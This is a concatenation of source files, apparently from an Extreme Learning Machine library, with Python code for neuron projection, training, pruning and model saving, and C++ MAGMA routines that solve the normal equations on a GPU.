assert isinstance(B, (np.ndarray, type(None))), "Bias vector (B) must be a Numpy ndarray"
# initialize skipped arguments
if W is None:
if func == "lin": # copying input features for linear neurons
number = min(number, self.inputs) # cannot have more linear neurons than features
W = np.eye(self.inputs, number)
else:
W = np.random.randn(self.inputs, number)
if func not in ("rbf_l1", "rbf_l2", "rbf_linf"):
W = W * (3 / self.inputs ** 0.5) # high dimensionality fix
if B is None:
B = np.random.randn(number)
if func in ("rbf_l2", "rbf_l1", "rbf_linf"):
B = np.abs(B)
B = B * self.inputs
if func == "lin":
B = np.zeros((number,))
assert W.shape == (self.inputs, number), "W must be size [inputs, neurons] (expected [%d,%d])" % (self.inputs, number)
assert B.shape == (number,), "B must be size [neurons] (expected [%d])" % number
ntypes = [nr[0] for nr in self.neurons] # existing types of neurons
if func in ntypes:
# add to an existing neuron type
i = ntypes.index(func)
_, nn0, W0, B0 = self.neurons[i]
number = nn0 + number
W = np.hstack((W0, W))
B = np.hstack((B0, B))
self.neurons[i] = (func, number, W, B)
else:
# create a new neuron type
self.neurons.append((func, number, W, B))
self.Beta = None # need to re-train network after adding neurons
def project(self, X):
# assemble hidden layer output with all kinds of neurons
assert len(self.neurons) > 0, "Model must have hidden neurons"
X, _ = self._checkdata(X, None)
H = []
cdkinds = {"rbf_l2": "euclidean", "rbf_l1": "cityblock", "rbf_linf": "chebyshev"}
for func, _, W, B in self.neurons:
# projection
if "rbf" in func:
self._affinityfix()
N = X.shape[0]
k = cpu_count()
jobs = [(X[idx], W.T, cdkinds[func], idx) for idx in np.array_split(np.arange(N), k*10)] #### ERROR HERE!!!
p = Pool(k)
H0 = np.empty((N, W.shape[1]))
for h0, idx in p.imap(cd, jobs):
H0[idx] = h0
p.close()
H0 = - H0 / B
# if func == "rbf_l2":
# H0 = - cdist(X, W.T, "euclidean")**2 / B
# elif func == "rbf_l1":
# H0 = - cdist(X, W.T, "cityblock")**2 / B
# elif func == "rbf_linf":
# H0 = - cdist(X, W.T, "chebyshev")**2 / B
else:
H0 = X.dot(W) + B
# transformation
if func == "lin":
pass
elif "rbf" in func:
ne.evaluate('exp(H0)', out=H0)
elif func == "sigm":
ne.evaluate("1/(1+exp(-H0))", out=H0)
elif func == "tanh":
ne.evaluate('tanh(H0)', out=H0)
else:
H0 = func(H0) # custom <numpy.ufunc>
H.append(H0)
if len(H) == 1:
H = H[0]
else:
H = np.hstack(H)
# print (H > 0.01).sum(0)
return H
def predict(self, X):
"""Predict targets for the given inputs X.
:param X: - model inputs
"""
assert self.Beta is not None, "Train ELM before predicting"
H = self.project(X)
Y = H.dot(self.Beta)
return Y
def error(self, Y, T):
"""Calculate error of model predictions.
"""
_, Y = self._checkdata(None, Y)
_, T = self._checkdata(None, T)
return self._error(Y, T)
def confusion(self, Y1, T1):
"""Compute confusion matrix for the given classification, iteratively.
"""
_, Y = self._checkdata(None, Y1)
_, T = self._checkdata(None, T1)
nn = np.sum([n1[1] for n1 in self.neurons])
N = T.shape[0]
batch = max(self.batch, nn)
nb = int(np.ceil(float(N) / self.batch)) # number of batches
C = self.targets
conf = np.zeros((C, C))
if self.classification in ("c", "wc"):
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop]).argmax(1)
Yb = np.array(Y[start:stop]).argmax(1)
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.sum((Tb == c1) * (Yb == c1h))
elif self.classification == "mc":
for b in xrange(nb):
start = b*batch
stop = min((b+1)*batch, N)
Tb = np.array(T[start:stop]) > 0.5
Yb = np.array(Y[start:stop]) > 0.5
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.sum(Tb[:, c1] * Yb[:, c1h])
else: # No confusion matrix
conf = None
return conf
######################
### helper methods ###
def _prune(self, idx):
"""Leave only neurons with the given indexes.
"""
idx = list(idx)
neurons = []
for nold in self.neurons:
k = nold[1] # number of neurons
ix1 = [i for i in idx if i < k] # index for current neuron type
idx = [i-k for i in idx if i >= k]
func = nold[0]
number = len(ix1)
W = nold[2][:, ix1]
bias = nold[3][ix1]
neurons.append((func, number, W, bias))
self.neurons = neurons
def _ranking(self, nn):
"""Returns a random ranking of hidden neurons.
"""
rank = np.arange(nn)
np.random.shuffle(rank)
return rank, nn
def _solve_corr(self, HH, HT):
"""Solve a linear system from correlation matrices.
"""
if self.accelerator == "GPU":
Beta = self.magma_solver.gpu_solve(HH, HT, self.alpha)
else:
Beta = cpu_solve(HH, HT, sym_pos=True)
return Beta
def _error(self, Y, T, R=None):
"""Returns regression/classification/multiclass error, also for PRESS.
"""
raise NotImplementedError("SLFN does not know the use case to compute an error")
def _train(self, X, T):
raise NotImplementedError("SLFN does not know the use case to train a network")
def __str__(self):
s = "SLFN with %d inputs and %d outputs\n" % (self.inputs, self.targets)
s += "Hidden layer neurons: "
for func, n, _, _ in self.neurons:
s += "%d %s, " % (n, func)
s = s[:-2]
return s
def _affinityfix(self):
# Numpy processor affinity fix
if "Linux" in platform.system():
a = np.random.rand(3, 1)
np.dot(a.T, a)
pid = os.getpid()
os.system("taskset -p 0xffffffff %d >/dev/null" % pid)
def save(self, fname):
assert isinstance(fname, basestring), "Model file name must be a string"
m = {"inputs": self.inputs,
"outputs": self.targets,
"neurons": self.neurons,
"Beta": self.Beta,
"alpha": self.alpha,
"Classification": self.classification,
"Weights_WC": self.weights_wc}
try:
cPickle.dump(m, open(fname, "wb"), -1)
except IOError:
raise IOError("Cannot create a model file at: %s" % fname)
def load(self, fname):
assert isinstance(fname, basestring), "Model file name must be a string"
try:
m = cPickle.load(open(fname, "rb"))
except IOError:
raise IOError("Model file not found: %s" % fname)
self.inputs = m["inputs"]
self.targets = m["outputs"]
self.neurons = m["neurons"]
self.Beta = m["Beta"]
self.alpha = m["alpha"]
self.classification = m["Classification"]
self.weights_wc = m["Weights_WC"]
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 18:18:35 2015
@author: akusok
"""
import numpy as np
from numpy.linalg import pinv, inv, norm
from numpy import dot
def prepare():
N = 125
nn = 5
o = 2
H = np.random.randn(N, nn)
W = np.random.randn(nn, o)
T = dot(H,W) + np.random.randn(N,o)*(0.01/6)
return H, T
@profile
def runall(H,T):
_ = inv(H.T.dot(H))
B = run1(H,T)
B1 = run2(H,T)
return B, B1
@profile
def run1(H,T):
# basic
HH = H.T.dot(H)
HT = H.T.dot(T)
P = inv(HH)
B = P.dot(HT)
return B
@profile
def run2(H,T):
# OS
j = 5
H0 = H[:-j]
H1 = H[-j:]
T0 = T[:-j]
T1 = T[-j:]
K0 = dot(H0.T, H0)
P0 = inv(K0)
a = inv(np.eye(j) + H1.dot(P0).dot(H1.T))
P1 = P0 - P0.dot(H1.T).dot(a).dot(H1).dot(P0)
B0 = P0.dot(H0.T.dot(T0))
B1 = B0 + P1.dot(H1.T.dot(T1) - H1.T.dot(H1).dot(B0))
return B1
h,t = prepare()
b,b1 = runall(h,t)
print norm(b-b1)
print "Done"
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include "magma.h"
class GpuSolver {
int n, nrhs;
magmaDouble_ptr dA=NULL, dB=NULL;
magma_queue_t queue;
public:
GpuSolver( int, int, magmaDouble_ptr A, magmaDouble_ptr B );
void add_data( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T );
void get_corr( magmaDouble_ptr XX, magmaDouble_ptr XT );
void solve( magmaDouble_ptr X );
void finalize();
};
// init a zero matrix on GPU to store X'*X, add normalization
GpuSolver::GpuSolver ( int nn, int outs, magmaDouble_ptr A, magmaDouble_ptr B ) {
magma_int_t err;
magma_int_t num = 0;
magma_device_t device;
magma_init();
err = magma_get_devices( &device, 1, &num );
if ( err != MAGMA_SUCCESS or num < 1 ) {
fprintf( stderr, "magma_get_devices failed: %d\n", (int) err );
exit(-1);
}
err = magma_queue_create( device, &queue );
if ( err != MAGMA_SUCCESS ) {
fprintf( stderr, "magma_queue_create failed: %d\n", (int) err );
exit(-1);
}
n = nn;
nrhs = outs;
magma_dmalloc( &dA, n*n );
magma_dmalloc( &dB, n*nrhs );
if ( dA == NULL || dB == NULL ) { fprintf( stderr, "malloc failed - not enough GPU memory?\n" ); }
magma_dsetmatrix( n, n, A, 0, n, dA, 0, n, queue );
magma_dsetmatrix( n, nrhs, B, 0, n, dB, 0, n, queue );
};
// update covariance matrices with new data
void GpuSolver::add_data ( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T ) {
real_Double_t time;
magmaDouble_ptr dX=NULL, dT=NULL;
magma_dmalloc( &dX, m*n );
magma_dmalloc( &dT, m*nrhs );
if ( dX == NULL || dT == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
goto cleanup;
}
magma_dsetmatrix( m, n, X, 0, m, dX, 0, m, queue );
magma_dsetmatrix( m, nrhs, T, 0, m, dT, 0, m, queue );
// time = magma_sync_wtime( NULL );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, nrhs, m,
1, dX, 0, m,
dT, 0, m,
1, dB, 0, n, queue );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, n, m,
1, dX, 0, m,
dX, 0, m,
1, dA, 0, n, queue );
// time = magma_sync_wtime( NULL ) - time;
// fprintf( stdout, "added data in %f sec\n", time );
cleanup:
magma_free( dX );
magma_free( dT );
};
// return current covariance matrices
void GpuSolver::get_corr ( magmaDouble_ptr XX, magmaDouble_ptr XT ) {
magma_dgetmatrix( n, n, dA, 0, n, XX, 0, n, queue );
magma_dgetmatrix( n, nrhs, dB, 0, n, XT, 0, n, queue );
};
// free memory
void GpuSolver::finalize( ) {
magma_free( dA );
magma_free( dB );
magma_finalize();
}
// Solve dA * dX = dB, where dA and dX are stored in GPU device memory.
// Internally, MAGMA uses a hybrid CPU + GPU algorithm.
void GpuSolver::solve( magmaDouble_ptr X )
{
//real_Double_t gpu_time;
//magmaDouble_ptr dX=NULL, dWORKD=NULL;
//float *dWORKS=NULL;
magma_int_t qrsv_iters;
magma_int_t info = 0;
//magma_dmalloc( &dX, n*nrhs );
//magma_dmalloc( &dWORKD, n*nrhs );
//magma_smalloc( &dWORKS, n*(n+nrhs) );
//if ( dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
// fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
// goto cleanup;
//}
// gpu_time = magma_wtime();
magma_dsposv_mic( MagmaUpper, n, nrhs,
dA, 0, n, dB, 0, n,
&info, queue );
// gpu_time = magma_wtime() - gpu_time;
// fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%d\n", info ); }
magma_dgetmatrix( n, nrhs, dB, 0, n, X, 0, n, queue );
//cleanup:
//magma_free( dX );
//magma_free( dWORKD );
//magma_free( dWORKS );
}
// ------------------------------------------------------------
// ------------------------------------------------------------
// Independent solver for dA * dX = dB, where dA and dX are stored in GPU device memory.
// Internally, MAGMA uses a hybrid CPU + GPU algorithm.
//void solve_corr( magma_int_t n, magma_int_t nrhs, magmaDouble_ptr A, magmaDouble_ptr B, magmaDouble_ptr X )
//{
// magma_init();
//
// real_Double_t gpu_time;
// magmaDouble_ptr dA=NULL, dB=NULL, dX=NULL, dWORKD=NULL;
// float *dWORKS=NULL;
// magma_int_t qrsv_iters;
// magma_int_t info = 0;
//
// magma_dmalloc( &dA, n*n );
// magma_dmalloc( &dB, n*nrhs );
// magma_dmalloc( &dX, n*nrhs );
// magma_dmalloc( &dWORKD, n*nrhs );
// magma_smalloc( &dWORKS, n*(n+nrhs) );
// if ( dA == NULL || dB == NULL || dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
// fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
// goto cleanup;
// }
//
// // send data to GPU (round n to ldda)
// magma_dsetmatrix( n, n, A, n, dA, n );
// magma_dsetmatrix( n, nrhs, B, n, dB, n );
//
// gpu_time = magma_wtime();
// magma_dsposv_gpu( MagmaUpper, n, nrhs,
// dA, n, dB, n, dX, n,
// dWORKD, dWORKS, &qrsv_iters, &info );
// gpu_time = magma_wtime() - gpu_time;
// fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
// if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
// if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%d\n", info ); }
//
// magma_dgetmatrix( n, nrhs, dX, n, X, n );
//
//cleanup:
// magma_free( dA );
// magma_free( dB );
// magma_free( dX );
// magma_free( dWORKD );
// magma_free( dWORKS );
// magma_finalize();
//}
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Nov 3 17:01:02 2014
@author: akusok
"""
import numpy as np
n = 12
d = 6
nn = 5
X1 = np.random.randint(200,255,size=(n,d/3))
X2 = np.random.randint(0,255,size=(n,d/3))
X3 = np.random.randint(1,5,size=(n,d/3))
X = np.hstack((X1,X2,X3))
#print X
mean = X.mean(0)
std = X.std(0)
W = np.random.randn(d,nn) / d**0.5
W = W / std.reshape(-1,1)
bias = -np.dot(W.T, mean)
H = X.dot(W) + bias
print H
print H.std()
print ((np.abs(H) < 5)*(np.abs(H)>0.2)).astype(np.int)
"""
from matplotlib import pyplot as plt
a = np.linspace(-5,5,10000)
b = np.tanh(a)
plt.plot(a,b,'-r')
plt.show()
"""<file_sep> # -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from numpy.linalg import lstsq
from .data_loader import batchX, batchT, c_dictT, decode
from .regularizations import semi_Tikhonov
from .error_functions import press
from .mrsr import mrsr
from .mrsr2 import mrsr2
from .elm import ELM
class ELM_SMALL(ELM):
"""Single-machine Extreme Learning Machine with model selection.
"""
def __init__(self, *args):
"""Create ELM of desired kind.
"""
super(ELM_SMALL, self).__init__(*args)
self.batch = -1 # batch < 0 means no batch processing
def project(self, X, delimiter=" "):
"""Projects inputs to a hidden layer.
"""
X, self.inputs, N = batchX(X, self.batch, delimiter)
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
return H
def train(self, X, T, delimiter=" ", neurons=[]):
"""Trains ELM, can use any X and T(=Y), and specify neurons.
Neurons: (number, type, [W], [B])
"""
# get data
if self.classification:
self.C_dict = c_dictT(T, self.batch)
X, self.inputs, N = batchX(X, self.batch, delimiter)
T, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
# get parameters of new data and add neurons
self.Xmean = X.mean(0)
self.Xstd = X.std(0)
# get mean value of targets
if self.classification or self.multiclass:
self.Tmean = np.zeros((self.targets,)) # for any classification
else:
self.Tmean = T.mean(0)
self.add_neurons(neurons, N)
# project data
nn = len(self.ufunc)
HH = np.zeros((nn, nn))
HT = np.zeros((nn, self.targets))
# get hidden layer outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T = semi_Tikhonov(H,T, self.Tmean) # add Tikhonov regularization
# least squares solution - multiply both sides by H'
p = float(X.shape[0]) / N
HH += np.dot(H.T, H)*p
HT += np.dot(H.T, T)*p
# solve ELM model
HH += self.cI * np.eye(nn) # enhance solution stability
self.B = lstsq(HH, HT)[0]
#self.B = np.linalg.pinv(HH).dot(HT)
def predict(self, X, delimiter=" "):
"""Get predictions using a trained or loaded ELM model.
:param X: input data
:rtype: predictions Th
"""
assert self.B is not None, "train this model first"
X, inputs, _ = batchX(X, self.batch, delimiter)
assert self.inputs == inputs, "incorrect dimensionality of inputs"
# project test inputs to outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
Th = H.dot(self.B)
# additional processing for classification
if self.classification:
Th = decode(Th, self.C_dict)
return Th
def loo_press(self, X, Y, delimiter=" "):
"""PRESS (Predictive REsidual Summ of Squares) error.
Trick is to never calculate full HPH' matrix.
"""
MSE = 0
X, _, N = batchX(X, self.batch, delimiter)
T, _ = batchT(Y, self.batch, delimiter, self.C_dict)
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
MSE = press(H, T, self.classification, self.multiclass)
return MSE
def prune_op(self, X, T, delimiter=" "):
"""Prune ELM as in OP-ELM paper.
"""
# get data iterators
X, self.inputs, N = batchX(X, self.batch, delimiter)
T, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
# get hidden layer outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T = semi_Tikhonov(H,T,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
rank = mrsr(H, T, nn)
# select best number of neurons
MSE = press(H[:, rank[:2]], T, self.classification, self.multiclass)
R_opt = rank[:2]
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
r = rank[:i]
mse1 = press(H[:,r], T, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = r
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
# update ELM parameters and re-calculate B
self.W = self.W[:,R_opt]
self.ufunc = [self.ufunc[j] for j in R_opt]
self.train(X, T)
def prune_op2(self, X, T, norm=1, delimiter=" "):
"""Prune ELM with a more recent implementation of MRSR.
:param norm: - check numpy.linalg.norm(X, <norm>)
"""
# get data iterators
X, self.inputs, N = batchX(X, self.batch, delimiter)
T, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
# get hidden layer outputs
H = np.dot(X,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T = semi_Tikhonov(H,T,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
# this MRSR2 is a class, with <.rank> attribute and <.new_input()> method
M = mrsr2(H, T, norm)
M.new_input()
M.new_input()
# select best number of neurons
MSE = press(H[:, M.rank], T, self.classification, self.multiclass)
R_opt = M.rank
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
M.new_input()
mse1 = press(H[:, M.rank], T, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = M.rank
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
del M
# update ELM parameters and re-calculate B
self.W = self.W[:,R_opt]
self.ufunc = [self.ufunc[j] for j in R_opt]
self.train(X, T)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Nov 5 19:30:23 2014
@author: akusok
"""
import numpy as np
a = [["a","a","b","c","c"],["c","a","a","a","a"]]
b = np.random.randint(0,3,size=(10,5))
dictA = {"a":0, "b":1, "c":2}
vA = np.vectorize(lambda x : dictA[x])
#print vA(a)
dictB = {0:10, 1:20, 2:30}
vB = np.vectorize(lambda x : dictB[x])
#print vB(b)
decode = {n: l for l,n in dictA.items()}
vD = np.vectorize(lambda x : decode[x])
#print vD(b)
####################################################
print "final test"
f = np.random.randint(0,3,size=(12,))
f = vD(f)
print "f: ", f
C = len(set(f))
Cval = list(set(f))
temp = np.eye(C)
dictF = {Cval[i] : temp[i] for i in range(C)}
def vF(data):
return np.vstack([dictF[val] for val in data])
print vF(f)
f2 = np.array([[1,0,0],
[0,1,0],
[0,0,1]])
un_dictF = {np.argmax(v): k for k,v in dictF.items()}
def un_vF(data):
return [un_dictF[i] for i in np.argmax(data, 1)]
print un_vF(f2)
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include "magma.h"
class GpuSolver {
int n, nrhs;
magmaDouble_ptr dA=NULL, dB=NULL;
public:
GpuSolver( int, int );
~GpuSolver(){
magma_free( dA );
magma_free( dB );
magma_finalize();
};
void add_data( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T );
void solve( magmaDouble_ptr X );
};
// init a zero matrix on GPU to store X'*X
GpuSolver::GpuSolver ( int nn, int outs ) {
magma_init();
n = nn;
nrhs = outs;
magma_int_t i, j;
magmaDouble_ptr A=NULL, B=NULL;
magma_dmalloc_cpu( &A, n*n );
magma_dmalloc_cpu( &B, n*nrhs );
magma_dmalloc( &dA, n*n );
magma_dmalloc( &dB, n*nrhs );
if ( dA == NULL || dB == NULL || A == NULL || B == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU or system memory?\n" );
goto cleanup;
}
for( j=0; j < n; ++j ) {
for( i=0; i < n; ++i ) { A[i + j*n] = 0; }
}
for( j=0; j < nrhs; ++j ) {
for( i=0; i < n; ++i ) { B[i + j*n] = 0; }
}
magma_dsetmatrix( n, n, A, n, dA, n );
magma_dsetmatrix( n, nrhs, B, n, dB, n );
cleanup:
magma_free_cpu( A );
magma_free_cpu( B );
};
// init a zero matrix on GPU to store X'*X
void GpuSolver::add_data ( magma_int_t m, magmaDouble_ptr X, magmaDouble_ptr T ) {
real_Double_t time;
magmaDouble_ptr dX=NULL, dT=NULL;
magma_dmalloc( &dX, m*n );
magma_dmalloc( &dT, m*nrhs );
if ( dX == NULL || dT == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU or system memory?\n" );
goto cleanup;
}
magma_dsetmatrix( m, n, X, m, dX, m );
magma_dsetmatrix( m, nrhs, T, m, dT, m );
time = magma_sync_wtime( NULL );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, nrhs, m,
1, dX, m,
dT, m,
1, dB, n );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, n, m,
1, dX, m,
dX, m,
1, dA, n );
time = magma_sync_wtime( NULL ) - time;
fprintf( stdout, "added data in %f sec\n", time );
cleanup:
magma_free( dX );
magma_free( dT );
};
// Solve dA * dX = dB, where dA and dB are the accumulated normal equations
// stored in GPU device memory, and copy the solution back into the host
// buffer X (n x nrhs, column-major).
// Internally, MAGMA uses a hybrid CPU + GPU mixed-precision algorithm
// (dsposv: single-precision Cholesky + iterative refinement in double).
void GpuSolver::solve( magmaDouble_ptr X )
{
    real_Double_t gpu_time;
    magmaDouble_ptr dX=NULL, dWORKD=NULL;   // removed unused local Z
    float *dWORKS=NULL;
    magma_int_t qrsv_iters;                 // refinement iterations, or negative code on failure
    magma_int_t info = 0;
    magma_dmalloc( &dX, n*nrhs );
    magma_dmalloc( &dWORKD, n*nrhs );       // double-precision workspace
    magma_smalloc( &dWORKS, n*(n+nrhs) );   // single-precision workspace
    if ( dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
        fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
        goto cleanup;
    }
    gpu_time = magma_wtime();
    magma_dsposv_gpu( MagmaUpper, n, nrhs,
                      dA, n, dB, n, dX, n,
                      dWORKD, dWORKS, &qrsv_iters, &info );
    gpu_time = magma_wtime() - gpu_time;
    fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
    if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
    // cast: magma_int_t may be 64-bit in ILP64 builds, so %d was unsafe
    if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%lld\n", (long long) info ); }
    magma_dgetmatrix( n, nrhs, dX, n, X, n );
cleanup:
    // BUGFIX: dWORKD and dWORKS were previously leaked on every call
    // (cleanup only freed dX).
    magma_free( dX );
    magma_free( dWORKD );
    magma_free( dWORKS );
}
// ------------------------------------------------------------
// Fill the m x n column-major matrix A (leading dimension lda) with
// uniform pseudo-random values in [0, 1] drawn from rand().
void dfill_matrix( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
    magma_int_t row, col;
    for( col = 0; col < n; ++col ) {
        for( row = 0; row < m; ++row ) {
            A[ row + col*lda ] = rand() / ((double) RAND_MAX);
        }
    }
}
int main( int argc, char** argv )
{
magma_int_t n = 15000;
magma_int_t lda = n;
magma_int_t ldx = lda;
magma_int_t nrhs = 1000;
printf( "using MAGMA GPU interface\n" );
GpuSolver g = GpuSolver(n, nrhs);
// fill some data
magmaDouble_ptr A=NULL, B=NULL;
magma_dmalloc_cpu( &A, n*n );
magma_dmalloc_cpu( &B, n*nrhs );
for (int i = 0; i < 2; i++) {
dfill_matrix( n, n, A, n );
dfill_matrix( n, nrhs, B, n );
g.add_data( n, A, B );
};
magmaDouble_ptr X=NULL;
magma_dmalloc_cpu( &X, n*nrhs );
g.solve( X );
magma_free_cpu( A );
magma_free_cpu( B );
magma_free_cpu( X );
return 0;
}
<file_sep>// This is a simple standalone example. See README.txt
#include <stdio.h>
#include <stdlib.h>
//#include "cublas_v2.h" // if you need CUBLAS, include before magma.h
#include "magma.h"
//#include "magma_lapack.h" // if you need BLAS & LAPACK
// Populate A (m x n, column-major, leading dimension lda) with uniform
// pseudo-random doubles in [0, 1] produced by rand().
void dfill_matrix( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
    magma_int_t r, c;
    for( c = 0; c < n; ++c ) {
        for( r = 0; r < m; ++r ) {
            A[ r + c*lda ] = rand() / ((double) RAND_MAX);
        }
    }
}
// Print every entry of the m x n column-major matrix A on a single line,
// traversing column by column ("%.03f " per entry), followed by one newline.
void dprint( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
    magma_int_t r, c;
    for( c = 0; c < n; ++c ) {
        for( r = 0; r < m; ++r ) {
            fprintf( stdout, "%.03f ", A[ r + c*lda ] );
        }
        // no per-column newline here -- see dprint2 for the multi-line variant
    }
    fprintf( stdout, "\n" );
}
// Print the m x n column-major matrix A, one column per output line
// ("%.03f " per entry), with a trailing blank line at the end.
void dprint2( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
    magma_int_t r, c;
    for( c = 0; c < n; ++c ) {
        for( r = 0; r < m; ++r ) {
            fprintf( stdout, "%.03f ", A[ r + c*lda ] );
        }
        fprintf( stdout, "\n" );   // newline after each column
    }
    fprintf( stdout, "\n" );
}
// ------------------------------------------------------------
// Solve A * X = B for an n x n symmetric positive-definite system with nrhs
// right-hand sides. A and B are column-major host buffers; the solution is
// copied back into the host buffer X. Internally, MAGMA uses a hybrid
// CPU + GPU mixed-precision algorithm (dsposv: single-precision Cholesky
// plus double-precision iterative refinement).
void gpu_solve( magma_int_t n, magma_int_t nrhs, magmaDouble_ptr A, magmaDouble_ptr B, magmaDouble_ptr X )
{
    // NOTE(review): main() also calls magma_init/magma_finalize; nesting the
    // pair here as well appears redundant -- confirm it is harmless.
    magma_init();
    real_Double_t gpu_time;
    magmaDouble_ptr dA=NULL, dB=NULL, dX=NULL, dWORKD=NULL;
    float *dWORKS=NULL;
    magma_int_t qrsv_iters;   // refinement iterations, or negative code on failure
    magma_int_t info = 0;
    magma_dmalloc( &dA, n*n );
    magma_dmalloc( &dB, n*nrhs );
    magma_dmalloc( &dX, n*nrhs );
    magma_dmalloc( &dWORKD, n*nrhs );       // double-precision workspace
    magma_smalloc( &dWORKS, n*(n+nrhs) );   // single-precision workspace
    if ( dA == NULL || dB == NULL || dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
        fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
        goto cleanup;
    }
    // send data to GPU (round n to ldda)
    magma_dsetmatrix( n, n, A, n, dA, n );
    magma_dsetmatrix( n, nrhs, B, n, dB, n );
    gpu_time = magma_wtime();
    magma_dsposv_gpu( MagmaUpper, n, nrhs,
                      dA, n, dB, n, dX, n,
                      dWORKD, dWORKS, &qrsv_iters, &info );
    gpu_time = magma_wtime() - gpu_time;
    fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
    if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
    // cast: magma_int_t may be 64-bit in ILP64 builds, so %d was unsafe
    if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%lld\n", (long long) info ); }
    magma_dgetmatrix( n, nrhs, dX, n, X, n );
cleanup:
    magma_free( dA );
    magma_free( dB );
    magma_free( dX );
    // BUGFIX: the workspace buffers were previously leaked on every call.
    magma_free( dWORKD );
    magma_free( dWORKS );
    magma_finalize();
}
// ------------------------------------------------------------
int main( int argc, char** argv )
{
magma_init();
magma_int_t n = 20000;
magma_int_t lda = n;
magma_int_t ldx = lda;
magma_int_t nrhs = 1000;
printf( "using MAGMA GPU interface\n" );
magmaDouble_ptr A=NULL, B=NULL, X=NULL;
magma_dmalloc_cpu( &A, lda*n );
magma_dmalloc_cpu( &B, ldx*nrhs );
magma_dmalloc_cpu( &X, n*nrhs );
dfill_matrix( n, n, A, n );
dfill_matrix( n, nrhs, B, n );
gpu_solve( n, nrhs, A, B, X );
magma_free_cpu( A );
magma_free_cpu( B );
magma_free_cpu( X );
magma_finalize();
return 0;
}
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 18:18:35 2015
@author: akusok
"""
import numpy as np
from numpy.linalg import pinv, inv, norm
from numpy import dot
#@profile
def prepare():
    """Verify the decremental (sample-removal) update of an OLS solution.

    Builds a random linear regression problem, computes the batch solution
    B0 directly on the last N-j samples, and the same solution B1 by
    analytically removing the first j samples from the full-data solution
    using a Sherman-Morrison-Woodbury style inverse update.  Prints and
    returns ||B0 - B1||, which should be numerically ~0.

    :return: float, discrepancy between direct and updated solutions
    """
    N = 125   # number of samples
    nn = 5    # number of features
    o = 2     # number of outputs
    H = np.random.randn(N, nn)
    W = np.random.randn(nn, o)
    T = dot(H, W) + np.random.randn(N, o) * (0.01 / 6)  # targets with small noise
    # basic batch solution on all N samples
